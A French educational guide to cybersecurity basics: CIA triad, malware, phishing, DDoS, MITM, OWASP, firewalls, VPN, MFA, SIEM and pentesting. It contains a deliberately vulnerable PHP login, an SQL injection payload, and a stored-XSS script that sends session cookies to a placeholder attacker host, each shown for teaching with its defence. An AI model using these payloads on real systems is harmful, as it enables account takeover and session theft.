🛡️ Cybersécurité – Attaques, Défense & Sécurité Réseau

1.1 Principes (Triade CIA)

La cybersécurité vise à protéger les systèmes d'information en garantissant trois principes fondamentaux, connus sous le nom de Triade CIA (ou DIC en français).

Principe	Signification	Objectif	Attaque Ciblée
Confidentialité (Confidentiality)	Seules les personnes autorisées peuvent accéder aux données.	Empêcher la divulgation non autorisée.	Espionnage, MITM, Vol de données.
Intégrité (Integrity)	Les données sont exactes, complètes et n'ont pas été modifiées sans autorisation.	Empêcher l'altération non autorisée.	Ransomware (chiffrement), modification de base de données.
Disponibilité (Availability)	Le système et les données sont accessibles et fonctionnels lorsque l'utilisateur en a besoin.	Empêcher l'interruption de service.	Attaque (D)DoS, Ransomware (verrouillage).

1.2 Concepts Clés

Terme	Description
Actif (Asset)	Toute donnée, appareil ou ressource ayant de la valeur (ex: base de données clients, serveur web).
Menace (Threat)	Tout ce qui peut potentiellement nuire à un actif (ex: un pirate, un malware, une inondation).
Vecteur d'Attaque	Le "chemin" utilisé par une menace pour atteindre l'actif (ex: un email de phishing, un port ouvert, une clé USB).
Surface d'Attaque	La somme de tous les vecteurs d'attaque possibles (tous les points d'entrée).
Vulnérabilité (CVE)	Une faiblesse (bug, mauvaise configuration) dans un actif qui peut être exploitée par une menace. (Référencée par un numéro CVE - Common Vulnerabilities and Exposures).
Exploit	Le code ou la technique qui utilise une vulnérabilité pour déclencher l'attaque.
Risque (Risk)	La probabilité qu'une menace exploite une vulnérabilité, multipliée par l'impact (le coût) si cela se produit. (Risque = Menace x Vulnérabilité x Impact).

1.3 Authentification (AAA)

AAA est le framework de base pour le contrôle d'accès.

1. Authentification (AuthN)

La question : "Qui êtes-vous ?"

C'est le processus de vérification de l'identité revendiquée par un utilisateur. On utilise des "facteurs" d'authentification :

Type 1 (Savoir) : Quelque chose que vous savez (Mot de passe, PIN).
Type 2 (Avoir) : Quelque chose que vous possédez (Clé USB YubiKey, Téléphone (TOTP)).
Type 3 (Être) : Quelque chose que vous êtes (Empreinte digitale, Visage).

MFA (Multi-Factor Authentication) : Utilise au moins 2 de ces 3 types (ex: Mot de passe + TOTP). (Voir 6.2).

2. Autorisation (AuthZ)

La question : "Qu'avez-vous le droit de faire ?"

Une fois authentifié (vous êtes bien "Bob"), ce processus détermine à quelles ressources "Bob" a accès.

Principe du Moindre Privilège (PoLP) : "Bob" (Comptable) ne doit avoir accès qu'aux serveurs de compta, et non aux serveurs de R&D.

3. Traçabilité (Accounting / Audit)

La question : "Qu'avez-vous fait ?"

C'est l'enregistrement (logging) de toutes les actions effectuées par l'utilisateur (connexion, accès fichier, suppression).

Indispensable pour l'analyse forensique (enquête) après un incident.

2.1 Malwares : Virus & Vers

Malware (Logiciel malveillant) est le terme générique.

Virus

Un virus est un code malveillant qui s'attache à un fichier hôte (ex: .exe, macro Word).

Propagation : Nécessite une action humaine pour se propager (ex: l'utilisateur doit exécuter le fichier infecté, ou ouvrir le document Word).

Ver (Worm)

Un ver est un malware autonome (standalone).

Propagation : Sa fonction principale est de se répliquer lui-même sur d'autres machines du réseau, sans intervention humaine. Il exploite activement les vulnérabilités réseau (ex: WannaCry, Stuxnet).

Les vers sont extrêmement dangereux car ils peuvent paralyser un réseau entier en quelques minutes.

2.2 Malwares : Chevaux de Troie & Rootkits

Cheval de Troie (Trojan)

Un malware qui se déguise en logiciel légitime (ex: un jeu gratuit, un "crack", un faux antivirus).

L'utilisateur l'exécute en pensant qu'il est inoffensif. Une fois lancé, le Trojan active sa charge utile (payload) malveillante.

Types de Payloads (Trojans)

Backdoor (Porte dérobée) : Ouvre un accès "secret" (ex: un port) pour que l'attaquant puisse revenir plus tard.
Spyware (Logiciel espion) : Vole des informations (ex: Keylogger - enregistre les frappes clavier).
Botnet : Enrôle la machine dans un réseau "zombie" (utilisé pour les attaques DDoS).

Rootkit

Un type de malware extrêmement furtif, conçu pour cacher sa propre présence (et celle d'autres malwares) sur le système.

Il opère au niveau le plus bas du système (parfois même au niveau du Noyau/Kernel) pour intercepter les appels système.

Exemple :
1. L'Antivirus demande au Système : "Liste les processus en cours".
2. Le Rootkit intercepte l'appel.
3. Le Rootkit renvoie la liste, mais *après avoir retiré*
   son propre processus (ex: "malware.exe") de la liste.
4. L'Antivirus ne voit rien.

2.3 Malwares : Ransomware (Rançongiciel)

Un Ransomware est un malware qui chiffre (crypte) les données de la victime (documents, photos, bases de données) et exige une rançon (généralement en cryptomonnaie) en échange de la clé de déchiffrement.

Types

Crypto-Ransomware : (Le plus courant) Chiffre les fichiers (ex: WannaCry, LockBit).
Locker-Ransomware : Verrouille l'écran de l'ordinateur (moins courant).

Double & Triple Extorsion

Les attaques modernes ne se contentent plus de chiffrer :

Double Extorsion : Exfiltration (vol) des données *avant* de les chiffrer. L'attaquant menace de publier les données si la rançon n'est pas payée.
Triple Extorsion : Ajoute une attaque DDoS sur le site public de la victime pour augmenter la pression.

Défense : La seule défense fiable est une sauvegarde (backup) hors ligne (immuable).

3.1 Attaques : Ingénierie Sociale (Phishing)

L'Ingénierie Sociale est l'art de manipuler la psychologie humaine (confiance, urgence, peur) pour contourner la sécurité. C'est souvent le vecteur d'attaque n°1.

Type	Description
Phishing (Hameçonnage)	Email de masse, non ciblé (ex: "Votre compte Netflix est bloqué, cliquez ici"). Tente de récupérer des identifiants (Credential Harvesting).
Spear Phishing	Phishing ciblé (ex: un email semblant venir du PDG, destiné au service compta, demandant un virement urgent). Très personnalisé.
Vishing / Smishing	Phishing par Voix (Vishing) (appel téléphonique) ou SMS (Smishing).
Baiting (Appât)	Laisser traîner une clé USB infectée (Appât physique) ou proposer un "film gratuit" (Appât numérique).

3.2 Attaques : (D)DoS (Déni de Service)

Une attaque DoS (Denial of Service) vise à rendre un service (ex: un site web) indisponible (voir "A" de la Triade CIA) en saturant ses ressources.

DoS (Denial of Service)

Une seule machine attaquante.

DDoS (Distributed DoS)

L'attaque est distribuée. L'attaquant utilise un Botnet (un réseau de milliers de machines zombies/infectées) pour lancer l'attaque simultanément. Impossible à bloquer (les IPs sources sont trop nombreuses).

Types d'attaques DDoS

Volumétrique (L3/L4) : (Le plus courant) Inonder la bande passante de la victime (ex: SYN Flood, UDP Flood).
Applicative (L7) : (Plus furtif) Viser une ressource coûteuse (ex: /recherche sur un site e-commerce) pour saturer le CPU ou la BDD.

Défense : Services "Anti-DDoS" (ex: Cloudflare, AWS Shield) qui absorbent et filtrent le trafic "sale".

3.3 Attaques : Man-in-the-Middle (MITM)

Une attaque MITM (Homme du Milieu) se produit lorsqu'un attaquant parvient à s'insérer secrètement au milieu d'une communication entre deux parties (ex: vous et votre banque), lui permettant d'écouter, de modifier ou de détourner le trafic.

Vecteurs d'attaque courants

ARP Spoofing (LAN) : Sur un LAN (ex: Wi-Fi public), l'attaquant envoie de faux paquets ARP (voir guide LAN) pour convaincre votre PC qu'il *est* le routeur (la passerelle). Tout votre trafic passe alors par le PC de l'attaquant.
SSL Stripping : Une attaque MITM qui force une connexion HTTPS (sécurisée) à basculer en HTTP (non sécurisé), permettant à l'attaquant de lire le trafic en clair.
Evil Twin (Jumeau Maléfique) : L'attaquant crée un faux Point d'Accès Wi-Fi (ex: "Starbucks_Free_Wifi_") pour que les victimes s'y connectent.

Défense : HTTPS (SSL/TLS), HSTS, et ne jamais faire confiance à un Wi-Fi public.

4.1 OWASP : Injection SQL

Une faille d'injection SQL (OWASP Top 10) se produit lorsqu'une application inclut des données non fiables (venant d'un utilisateur) dans une requête de base de données, sans les valider ou les "échapper" correctement.

Code Vulnérable (PHP/SQL)

L'application veut vérifier un login/mot de passe :

$user = $_POST['username'];
$pass = $_POST['password'];

// VULNÉRABLE : Concaténation de strings
$sql = "SELECT * FROM users WHERE user = '$user' AND pass = '$pass'";
$db->query($sql);

L'Attaque

L'attaquant n'a pas besoin de mot de passe. Il entre ceci dans le champ "username" :

' OR '1'='1

La requête SQL devient :

SELECT * FROM users WHERE user = '' OR '1'='1' --' AND pass = '...'

La condition '1'='1' est toujours vraie. La requête retourne tous les utilisateurs, et l'attaquant est connecté (souvent en tant que premier utilisateur, l'admin).

Défense

Requêtes Préparées (Prepared Statements) : Envoyer la "structure" SQL et les "données" (variables) séparément. (Voir guide PHP).

4.2 OWASP : XSS (Cross-Site Scripting)

Une faille XSS (OWASP Top 10) se produit lorsqu'une application inclut des données non fiables (venant d'un utilisateur) dans sa page (HTML) côté client, sans les valider ou les "échapper" (encoder).

Cela permet à un attaquant d'exécuter du JavaScript arbitraire dans le navigateur de la victime.

XSS Stocké (Stored) - Le plus dangereux

L'attaquant poste un commentaire sur un blog. Son commentaire est : <script>fetch('https://pirate.com/steal?cookie=' + document.cookie);</script>
Le site (vulnérable) stocke ce script (brut) dans sa base de données.
Une Victime (ex: un Admin) visite la page du blog.
Le site affiche le commentaire de l'attaquant.
Le navigateur de l'Admin exécute le script <script>...</script>.
Le script vole le cookie de session de l'Admin et l'envoie au pirate (Session Hijacking).

XSS Reflété (Reflected)

Le payload (script) n'est pas stocké. Il est "reflété" par l'URL.

Exemple : Un site de recherche vulnérable /search.php?q=mon-terme qui affiche "Résultats pour: mon-terme".

L'attaquant envoie un email de phishing à la victime avec un lien :
/search.php?q=<script>alert(1);</script>
La victime clique. Le serveur (vulnérable) génère le HTML :
<h1>Résultats pour: <script>alert(1);</script></h1>
Le navigateur de la victime exécute le script.

Défense : Output Encoding. Échapper le HTML (ex: htmlspecialchars() en PHP) pour que < devienne <.

4.3 OWASP Top 10

L'OWASP (Open Web Application Security Project) publie une liste (mise à jour régulièrement) des 10 risques de sécurité les plus critiques pour les applications web. C'est le standard de l'industrie.

Exemple (Liste 2021)

Rang	Vulnérabilité	Exemple
A01	Broken Access Control	Contrôle d'accès défaillant (ex: un utilisateur normal accède à `/admin`).
A02	Cryptographic Failures	Mauvais chiffrement (ex: stockage de mots de passe en MD5).
A03	Injection	(Injection SQL, NoSQL, OS Command).
A04	Insecure Design	Problèmes de conception (architecture non sécurisée).
A05	Security Misconfiguration	Mauvaise configuration (ex: ports ouverts, messages d'erreur verbeux).
A06	Vulnerable Components	Utilisation de librairies (NPM, Maven) avec des failles connues (CVEs).
A07	Identification/Authentication Failures	Authentification défaillante (ex: pas de MFA, mots de passe faibles).
A08	Software/Data Integrity Failures	Intégrité logicielle (ex: mise à jour non vérifiée).
A09	Security Logging/Monitoring Failures	Manque de logs ou de surveillance.
A10	SSRF (Server-Side Request Forgery)	L'attaquant force le serveur à faire une requête (ex: vers une IP interne).

5.1 Défense : Firewall (Rappel)

Le Firewall est la première ligne de défense du réseau (périmètre).

Stateless (ACL) : (Voir 1.3 & 4.3) Filtrage L3/L4 simple.
Stateful (SPI) : (Voir 2.2) Filtrage L3/L4 intelligent, basé sur l'état des connexions. C'est le standard (Windows Firewall, iptables, pfSense...).
NGFW (Next-Gen) : (Voir 2.3) Filtrage L7 (Application). Peut bloquer "Facebook" ou des signatures de malwares.

5.2 Défense : Architecture DMZ

Une DMZ (Zone Démilitarisée) est un réseau "tampon" (une 3ème zone de confiance) créé par un firewall. C'est la zone destinée à héberger les serveurs qui doivent être accessibles depuis Internet (Untrust).

La Règle d'Or de la DMZ

Le trafic est géré par des règles strictes pour protéger le LAN (Trust) :

Interface 1: WAN (Untrust)
Interface 2: LAN (Trust)
Interface 3: DMZ (Semi-Trust) <- Serveur Web

Règles de Firewall :
1. PERMIT WAN -> DMZ (Port 443)  (Internet voit le serveur web)
2. PERMIT LAN -> WAN (Sortie Internet)
3. PERMIT LAN -> DMZ (Les admins accèdent au serveur web)
4. DENY   DMZ -> LAN (La règle la plus importante !)

Si le serveur web (DMZ) est piraté, le pirate est bloqué dans la DMZ et ne peut pas atteindre le LAN.

5.3 Défense : IDS / IPS

Ces systèmes analysent le trafic (DPI) à la recherche de signatures d'attaques connues (ex: exploits, scans de ports).

IDS (Intrusion Detection System)

Mode : Passif (Détection).

L'IDS "écoute" le trafic (ex: via un port "mirror" sur un switch) mais n'est pas dans le chemin.

S'il détecte une attaque : Il lève une alerte (envoie un email, un log SIEM).

IPS (Intrusion Prevention System)

Mode : Actif (Prévention).

L'IPS est dans le chemin du trafic (en ligne), souvent intégré au NGFW.

S'il détecte une attaque : Il bloque (drop) le paquet malveillant avant qu'il n'atteigne la cible.

6.1 Défense : VPN (Virtual Private Network)

Un VPN crée un "tunnel" crypté et privé à travers un réseau public (généralement Internet). Il garantit la Confidentialité et l'Intégrité du trafic.

VPN IPsec (Site-to-Site)

Utilisé pour connecter deux LANs (ex: Bureau Paris <-> Bureau Lyon) de manière permanente. Le tunnel est géré par les routeurs/firewalls des deux sites.

Les utilisateurs n'ont rien à faire ; le trafic est automatiquement crypté et "tunnelé" par le routeur.

VPN SSL/TLS (Client-to-Site)

Utilisé par les télétravailleurs pour se connecter au réseau de l'entreprise.

L'utilisateur lance un logiciel client (ex: OpenVPN, Cisco AnyConnect) sur son PC, qui établit un tunnel sécurisé vers le firewall de l'entreprise.

6.2 Défense : IAM & MFA

IAM (Identity and Access Management)

L'IAM est le cadre (politiques, technologies) qui gère l'identité numérique (qui est qui) et les autorisations (qui a le droit de faire quoi).

C'est l'implémentation de l'AAA (voir 1.3) à grande échelle, souvent gérée par Active Directory (AD) ou des solutions cloud (Azure AD, Okta).

Principe clé : Moindre Privilège (PoLP). Un utilisateur ne doit avoir que le minimum d'accès requis pour faire son travail.

MFA (Multi-Factor Authentication)

Le MFA (ou 2FA - Two-Factor) est la mesure de sécurité la plus efficace contre le vol d'identifiants (phishing).

Elle demande à l'utilisateur de prouver son identité en utilisant au moins deux des trois types de facteurs (Savoir, Avoir, Être).

Exemple courant (2FA) :

Facteur 1 (Savoir) : Mot de passe.
Facteur 2 (Avoir) : Code TOTP (ex: Google Authenticator) ou Clé FIDO2 (YubiKey).

Zero Trust (Confiance Zéro)

C'est la philosophie de sécurité moderne.

Ancien modèle ("Château Fort") : "Difficile d'entrer (Firewall), mais une fois dedans (LAN), tout le monde est de confiance." (Désastreux si un attaquant rentre).

Modèle Zero Trust : "Ne jamais faire confiance, toujours vérifier" (Never Trust, Always Verify).

Il n'y a plus de "réseau de confiance" (même le LAN est hostile).
Chaque connexion (même LAN -> LAN) doit être authentifiée (MFA) et autorisée.
La micro-segmentation (VLANs, Firewalls) est utilisée partout.

6.3 Défense : Cryptographie

La cryptographie est la base de la Confidentialité et de l'Intégrité.

Type	Concept	Algorithmes	Usage
Hachage (Hash)	Fonction à sens unique (non réversible). Vérifie l'intégrité (Checksum).	MD5 (Obsolète), SHA-256	Stockage de mots de passe, Signature de fichier.
Symétrique	Une seule clé (secrète) pour chiffrer ET déchiffrer. Très rapide.	DES (Obsolète), AES	Chiffrement de masse (disques durs, connexions VPN/TLS).
Asymétrique	Deux clés (Paire) : 1 Publique (pour chiffrer), 1 Privée (pour déchiffrer). Lent.	RSA, ECC	Échange de la clé symétrique (le "Handshake" TLS), Signatures numériques.

7.1 Outils : SIEM & SOC

SIEM (Security Information & Event Management)

Un SIEM (ex: Splunk, ELK Stack) est un "aspirateur à logs".

Il collecte, agrège, et corrèle les logs de tous les appareils (Firewalls, Serveurs, AD, Switchs, PC) en un seul endroit.

Objectif : Détecter les menaces en corrélant des événements (ex: "50 logins échoués (AD)" + "suivis d'un scan de port (Firewall)" = Alerte !).

SOC (Security Operations Center)

Un SOC est l'équipe humaine (les analystes sécurité) qui surveille les alertes du SIEM (et autres outils) 24/7, trie les incidents, et répond aux attaques (Incident Response).

7.2 Stratégie : Pentest (Test d'Intrusion)

Un Pentest est un audit de sécurité offensif : une attaque simulée (et autorisée) contre un système pour trouver des vulnérabilités avant que les vrais pirates ne les trouvent.

Types de Pentest (Niveau d'information)

Black Box (Boîte Noire) : L'attaquant n'a aucune information (juste le nom de l'entreprise). (Condition réelle).
Grey Box (Boîte Grise) : L'attaquant a des informations limitées (ex: un compte utilisateur normal).
White Box (Boîte Blanche) : L'attaquant a toutes les informations (Code source, schémas d'architecture). (Permet un audit en profondeur).

Red Team vs. Blue Team

Red Team (Attaque) : L'équipe "offensive" qui simule l'attaquant et tente de s'introduire.
Blue Team (Défense) : L'équipe "défensive" (souvent le SOC) qui doit détecter et bloquer la Red Team.
Purple Team : Exercice où les deux équipes collaborent pour améliorer la détection.

7.3 Cheat-sheet : Bonnes Pratiques (Défense en profondeur)

✅ Prévention (Utilisateur & Accès)

MFA : Activer le Multi-Factor Authentication (MFA) partout (Admin, Email, VPN).
Moindre Privilège : Ne donnez que les droits minimums nécessaires.
Formation : Former les utilisateurs à détecter le Phishing.
Mots de passe : Politique de mots de passe robustes (longs) + Gestionnaire (Vault).

✅ Prévention (Système & Réseau)

Patch Management : Mettre à jour immédiatement (OS, Logiciels, Librairies).
Firewall : Politique "Implicit Deny" (tout bloquer, n'autoriser que le nécessaire).
Segmentation : Utiliser des VLANs (ex: VLAN Invités, VLAN IoT, VLAN Admin).
Backups (3-2-1) : 3 copies, sur 2 médias différents, dont 1 hors site (offline/immuable). (Vital contre Ransomware).
Logging : Activer et centraliser les logs (SIEM).

🛡️ Cybersécurité – Attaques, Défense & Sécurité Réseau

Principes (Triade CIA)

Concepts Clés

Authentification (AAA)

Malwares : Virus & Vers

Malwares : Trojans & Rootkits

Malwares : Ransomware

Ingénierie Sociale

Attaques (D)DoS

Attaques (MITM)

OWASP : Injection SQL

OWASP : XSS

OWASP Top 10

Défense : Firewall & ACL

Défense : DMZ

Défense : IDS / IPS

Défense : VPN

Défense : IAM & MFA

Défense : Cryptographie

Outils : SIEM & SOC

Stratégie : Pentest

Cheat-sheet